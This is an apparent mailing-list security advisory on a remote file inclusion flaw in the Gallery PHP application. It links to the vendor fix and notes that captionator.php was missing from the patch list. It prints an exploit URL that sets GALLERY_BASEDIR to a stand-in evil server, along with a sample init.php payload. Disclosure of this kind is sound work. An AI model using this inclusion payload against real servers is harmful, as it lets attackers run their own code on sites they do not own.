Hi!

Code injection in gallery
-------------------------------------
# What is gallery?
The Gallery is actually the best web gallery application around in the
world.
I'm using it too ;-).
Go to <http://gallery.sf.net/> to get further information and download this
very cool app.

#### remote include problems ####
# Problem description

There are several include statements that includes a variable
without checking it. A administrator of PowerTech (an ISP in Norway)
discovered this problems.

You're able to inject foreign code into the application (if allow_url_fopen
is turned on).

Example code:
errors/configmode.php
[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]

# How can I exploit the code?
Use this
line:
http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/

On http://your.evil.server.tdl/ you place a file called init.php that puts
out nasty php-code.
The file could look like this:
init.php:
<?php
echo "<?php phpinfo(); ?>";
?>

# And the solution?
Go
to
<http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=50&mode=thread&order=0&thold=0> to see how to solve the problem.

# Why do you post this problem again?
Because the author of the announcement on the gallery website said:
An alternative to doing a full upgrade is to patch the files that contain
the security fix. This is relativ
ely easy to do. All you need to do is edit these files:
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php

That's not absolutely right...you have to patch the file:
captionator.php too!

Hope it's fixed in new releases :).
PS: Their website is now updated.

##### Credits #####
For the german-speaking folk: <http://bluephod.net/>
Noncredit: florg, thank you for turning off the whole website! :/

-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]